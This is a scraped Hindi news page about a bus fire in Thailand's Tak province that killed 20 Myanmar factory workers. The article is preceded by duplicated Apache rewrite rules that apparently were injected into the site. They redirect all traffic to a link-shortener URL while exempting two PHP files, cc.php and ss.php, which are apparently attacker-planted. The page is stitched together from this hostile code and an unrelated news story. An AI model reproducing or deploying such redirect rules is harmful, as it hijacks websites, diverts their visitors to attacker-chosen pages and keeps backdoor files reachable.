
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 367
Previous Nextनई दिल्ली। बैंकॉक के पश्चिमी थाईलैंड के टक प्रांत में श्रमिकों से भरी एक बस में आग लग गई। जब तक श्रमिक बस से निकलते तब तक आग इतनी तेजी से फैल चुकी थी की 20 लोग बस में ही जलकर मर गए। इस हादसे में 27 लोगों को बचा लिया गया है, जिसमें से एक की हालत काफी गंभीर बताई जा रही है। स्थानीय मीडिया के मुताबिक पश्चिमी थाईलैंड के टक प्रांत में श्रीमकों से भरी बस थाई कारखाने जा रही थी। इस बस में सवार सभी मजदूर म्यांमार के थे। पुलिस ने बताया कि बस के बीच में आग लगी, जिसके कारण आगे बैठे लोग तो बस से उतर गए लेकिन पीछे बैठे लोग बस से निकल ही नहीं पाए। इस हादसे में 20 लोगों की जलकर मौत हो गई, जबकि 27 लोगों बचकर निकलने में कामयाब रहे। घायलों को इलाज के लिए अस्पताल में भर्ती कराया गया है जहां एक की हालत बेहद गंभीर है।